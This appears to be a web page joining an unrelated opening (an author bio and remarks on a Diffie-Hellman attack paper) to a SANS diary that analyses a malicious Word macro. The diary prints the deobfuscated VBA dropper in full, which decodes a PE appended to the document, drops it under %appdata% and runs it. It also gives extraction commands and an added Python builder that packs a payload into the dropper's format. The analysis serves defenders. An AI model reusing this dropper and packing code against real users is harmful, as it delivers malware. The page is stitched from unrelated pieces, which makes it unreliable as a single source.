
Speaking at a security conference (left to right): Whitfield Diffie, Martin Hellman, Brian Snow. (credit: Flickr user: Dan Farber)

Martijn Grooten is a mathematician-turned-security professional. He is currently Editor of Virus Bulletin and does the occasional security research on the side in which, wherever possible, he likes to use his mathematical background. This post originally appeared on Martijn's Lapsed Ordinary blog.

Earlier this year, a research paper presented a new attack against the Diffie-Hellman key exchange protocol. Among other things, the paper came with a reasonable explanation of how the NSA might be able to read a lot of the Internet’s VPN traffic. I wrote a blog about this in May.

Last month, the paper was presented at the ACM CCS 2015 conference and thus made the news again. While the research does have serious implications, it did not signal the end of the use of the Diffie-Hellman protocol, as some suggested.


 

This week, I was busy with an incident which involved an interesting malicious Word document. OLE documents with malicious macros are not new; I receive a few of them every day in my mail trap. As long as they remain a great way to compromise end-user computers, the flood won't stop. Usually, the macro is executed (the user is asked to enable its execution using social engineering traps like "The content of this document is protected, enable macros to view it") and then fetches its payload from a remote site, as in this typical snippet (the target URL was not captured on this page):

    BHJQWGDHJQWGDWQ = "MSXML2.ServerXMLHTTP"
    Set Tghafsdghqhjwgdhjqwgdjhqwgdqwd = CreateObject(BHJQWGDHJQWGDWQ)
    Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open "GET", ggFw...

The good point (or the bad point, depending on which side you are on, attacker or defender) is that this helps to create interesting lists of IOCs: IP addresses, URLs, domains or filenames. It's quite easy to deobfuscate the macro and collect the IOCs.

In the incident I was involved in, there was no network traffic generated by the malicious macro. The payload was already present and appended at the end of the Word file. The document was generated in September 2015 and its VT score was only 2/43 (3 days ago). I was the first to submit it. The content of the document was properly formatted, with interesting information for the victim (of course). I used Didier Stevens's toolbox to analyze the document.

The document was created by a user "Helmut" and contains the following streams (oledump marks stream 11 with an upper-case "M": a macro stream with actual code, whereas the lower-case "m" of stream 8 means attributes only):

    $ oledump.py malicious.doc
      1:       121 '\x01CompObj'
      2:      4096 '\x05DocumentSummaryInformation'
      3:      4096 '\x05SummaryInformation'
      4:     23860 '1Table'
      5:    781575 'Data'
      6:       486 'Macros/PROJECT'
      7:        71 'Macros/PROJECTwm'
      8: m     940 'Macros/VBA/ThisDocument'
      9:      3256 'Macros/VBA/_VBA_PROJECT'
     10:       569 'Macros/VBA/dir'
     11: M    6052 'Macros/VBA/islamabad'
     12:    257675 'WordDocument'

The interesting macro is in section 11 (note the name: "islamabad"). Let's dump it, decompressed:

    $ oledump.py -s 11 -v malicious.doc

[Note: I performed some cleanup and deobfuscation in the macro code to make it more readable.]

Basically, the malicious payload (a classic PE file) is appended to the Word document with extra data: the size of the payload and a checksum. Let's have a look at the code. The module starts with its name and a global variable that will hold the dropped filename:

    Attribute VB_Name = "islamabad"
    Public var_Filename1 As String

The checksum is a plain XOR of every byte of the (decoded) payload, so it detects corruption but offers no integrity protection against tampering:

    Function func_Checksum(var_Data() As Byte, var_Len As Long) As Byte
        For I = 0 To var_Len - 1
            func_Checksum = func_Checksum Xor var_Data(I)
        Next I
    End Function

The binary is XOR-encoded with a rolling key: the key starts at 11 and, after each byte, is XORed with 13 and with the byte index modulo 256. Because the key stream does not depend on the data, the same routine both encodes and decodes:

    Function func_DecodeBinary(var_Data() As Byte, var_Len As Long) As Boolean
        Dim var_IV1 As Byte
        var_IV1 = 11
        For I = 0 To var_Len - 1
            var_Data(I) = var_Data(I) Xor var_IV1
            var_IV1 = ((var_IV1 Xor 13) Xor (I Mod 256))
        Next I
        func_DecodeBinary = True
    End Function

This function changes the document layout (it also strips every section header), and the document is silently saved again on close:

    Function func_FormatDocument() As Boolean
        ActiveDocument.GrammarChecked = False
        ActiveDocument.SpellingChecked = False
        ActiveDocument.Select
        Selection.Font.ColorIndex = wdBlack
        Selection.Font.Underline = wdUnderlineNone
        Selection.HomeKey
        For Each sec In ActiveDocument.Sections
            For Each head In sec.Headers
                head.Range.Delete
            Next
        Next
        ViewDocument = True
    End Function

    Sub AutoClose()
        ActiveDocument.Save
    End Sub

And now the principal function, AutoOpen(), which runs as soon as macros are enabled:

    Sub AutoOpen()
        On Error GoTo ErrorCondition1
        Dim var_Dummy1 As Boolean
        var_Dummy1 = func_FormatDocument()
        Dim fh_File1
        Dim var_Filesize As Long
        Dim var_BinarySize As Long
        Dim var_Checksum As Byte

We get the file size, open the document itself, and extract the checksum (one byte located at EOF-4) and the binary stream size (a 4-byte Long at EOF-3). Two sanity checks follow (the comparison operators were lost when the page was extracted; the first is a minimum size, the second rejects a size larger than the file):

        var_Filesize = FileLen(ActiveDocument.FullName)
        fh_File1 = FreeFile
        Open (ActiveDocument.FullName) For Binary As #fh_File1
        Get #fh_File1, (var_Filesize - 4), var_Checksum
        Get #fh_File1, (var_Filesize - 3), var_BinarySize
        If var_BinarySize < 8 Then
            GoTo ErrorCondition1
        End If
        If (var_BinarySize + 4) > var_Filesize Then
            GoTo ErrorCondition1
        End If

The script computes the starting position of the data stream and prepares a byte array with the correct size, then reads the encoded binary and decodes it in place:

        Dim var_Offset As Long
        var_Offset = var_Filesize - (var_BinarySize + 4)
        Dim var_BinaryData1() As Byte
        ReDim var_BinaryData1(var_BinarySize - 1)   ' sized to the payload, as the text describes
        Get #fh_File1, var_Offset, var_BinaryData1
        Close #fh_File1
        If Not func_DecodeBinary(var_BinaryData1(), var_BinarySize) Then
            GoTo ErrorCondition1
        End If

The checksum of the decoded data is compared with the one stored in the file:

        Dim var_Dummy2 As Byte
        var_Dummy2 = func_Checksum(var_BinaryData1(), var_BinarySize)
        If var_Checksum <> var_Dummy2 Then
            GoTo ErrorCondition1
        End If

The default path to drop the payload is obfuscated with Chr() calls (value: %appdata%\Microsoft\Word):

        var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100)

The object "Scripting.FileSystemObject" is created, its name also obfuscated:

        Set var_Object1 = CreateObject("Scripting" & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))

Just in case the default path does not exist (which should not be the case, because Word is present on the target system), the script falls back to %appdata% itself:

        If Not var_Object1.FolderExists(var_Path1) Then
            var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97))
        End If
        Set var_Object1 = Nothing
        Dim fh_File2
        fh_File2 = FreeFile

The dropped payload filename is also obfuscated (value: wfletxavb.exe). The file is created and the decoded binary is written to it:

        var_Filename1 = var_Path1 & "\" & Chr(119) & Chr(102) & Chr(108) & Chr(101) & Chr(116) & Chr(120) & Chr(97) & Chr(118) & Chr(98) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
        Open (var_Filename1) For Binary As #fh_File2
        Put #fh_File2, 1, var_BinaryData1
        Close #fh_File2

Finally, the payload is executed through WScript.Shell. On any error, the handles are closed and the document is saved, so a failed run leaves no trace other than the modified document:

        Set var_Object2 = CreateObject("WScript.Shell")
        var_Object2.Exec var_Filename1
        Exit Sub
    ErrorCondition1:
        Close #fh_File1
        Close #fh_File2
        ActiveDocument.Save
    End Sub

By reversing the macro, we can compute the starting position of the binary and extract it manually with Didier's cut-bytes.py tool. We need to skip the last bytes of the document (containing the payload size and checksum):

[Note: Didier added a new feature to his tools to help me extract data: it's now possible to ignore bytes at the end of the file (the -5 below: the 1-byte checksum plus the 4-byte size).]

    $ cut-bytes.py position:-5 malicious.doc > binary.data
    $ file binary.data
    binary.data: data

The decoding function being in the macro, we can reuse it and write a specific decoder for Didier's translate.py (the -f option hands the whole file to the function at once):

    def FileDecode(input):
        # Python 2 style: 'input' is the raw file content as a str
        output = ''
        code = 11
        for iIter in range(len(input)):
            output += chr(ord(input[iIter]) ^ code)
            code = (code ^ 13) ^ (iIter % 256)
        return output

    $ cat binary.data | translate.py -f -s decoder_caseXXXX.py -o binary.exe FileDecode
    $ file binary.exe
    binary.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
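To tie the macro walk-through and the manual cut-bytes/translate.py extraction together, here is a stand-alone Python re-implementation of the same trailer parsing, rolling-XOR decoding and checksum verification. This is an added example, not code from the diary or from Didier's toolbox. The function names (rolling_xor, extract_payload, carries_appended_pe) and the sample document and PE stand-in are constructed for the demo; the trailer layout (1-byte checksum followed by a 4-byte little-endian size) is what AutoOpen() reads above. The build_sample() helper is an assumption about how the attacker's builder must lay out the file for the macro to accept it, derived from the checks in AutoOpen().

```python
"""Re-implementation of the macro's payload extraction (added example, not the
diary's code). File layout the macro expects, from the end of the file:
    [encoded PE][1-byte XOR checksum][4-byte little-endian size]
All sample data below is constructed for this demo."""
import struct

TRAILER_LEN = 5              # 1 checksum byte + 4-byte VBA Long (little-endian)
KEY_SEED, KEY_STEP = 11, 13  # constants taken from func_DecodeBinary


def rolling_xor(data: bytes) -> bytes:
    """func_DecodeBinary: key starts at 11; after each byte key ^= 13 ^ (i % 256).
    The key stream does not depend on the data, so this is its own inverse."""
    out = bytearray(len(data))
    key = KEY_SEED
    for i, b in enumerate(data):
        out[i] = b ^ key
        key = ((key ^ KEY_STEP) ^ (i % 256)) & 0xFF  # VBA Byte arithmetic
    return bytes(out)


def xor_checksum(data: bytes) -> int:
    """func_Checksum: XOR of every byte of the *decoded* payload."""
    c = 0
    for b in data:
        c ^= b
    return c


def build_sample(document: bytes, payload: bytes) -> bytes:
    """Assumed builder: the layout AutoOpen() accepts (document, encoded PE, trailer)."""
    trailer = bytes([xor_checksum(payload)]) + struct.pack("<i", len(payload))
    return document + rolling_xor(payload) + trailer


def extract_payload(blob: bytes) -> bytes:
    """Replay AutoOpen(): read the trailer, bound the size, decode, verify checksum."""
    if len(blob) < TRAILER_LEN:
        raise ValueError("file shorter than the trailer")
    checksum = blob[-TRAILER_LEN]
    size = struct.unpack("<i", blob[-4:])[0]
    if size < 8 or size + TRAILER_LEN > len(blob):
        raise ValueError("size field inconsistent with file length: %d" % size)
    encoded = blob[-(TRAILER_LEN + size):-TRAILER_LEN]
    decoded = rolling_xor(encoded)
    if xor_checksum(decoded) != checksum:
        raise ValueError("checksum mismatch")
    return decoded


def carries_appended_pe(blob: bytes) -> bool:
    """Triage helper: True only if the trailer parses, the checksum matches and the
    decoded blob starts with an MZ header. Handy for sweeping a mail trap for other
    documents built with the same packer."""
    try:
        return extract_payload(blob)[:2] == b"MZ"
    except ValueError:
        return False


# Constructed demo data (not real samples): OLE magic plus filler, and a PE stand-in.
FAKE_DOC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"Quarterly report " * 20
FAKE_PE = b"MZ" + bytes(range(256)) * 2 + b"PE\x00\x00" + b"\x00" * 16

if __name__ == "__main__":
    sample = build_sample(FAKE_DOC, FAKE_PE)
    pe = extract_payload(sample)
    print("payload %d bytes, MZ header: %s, checksum 0x%02x"
          % (len(pe), pe[:2] == b"MZ", xor_checksum(pe)))
    print("plain document flagged:", carries_appended_pe(FAKE_DOC))
```

Because the checksum is a single XOR byte and the trailer is fixed-length, carries_appended_pe() is cheap enough to run over a whole directory of suspicious .doc files; a clean document fails on the size check long before any decoding happens.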

This PE file was never sent to VirusTotal and is clearly malicious. More investigations are still ongoing.

The construction of the file (OLE document + encoded PE file + checksum + PE file length) looks ideal for the attackers to quickly generate a new encoded PE file and simply append it to the same Word document. I can't share the samples at this time, investigations are still ongoing.

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 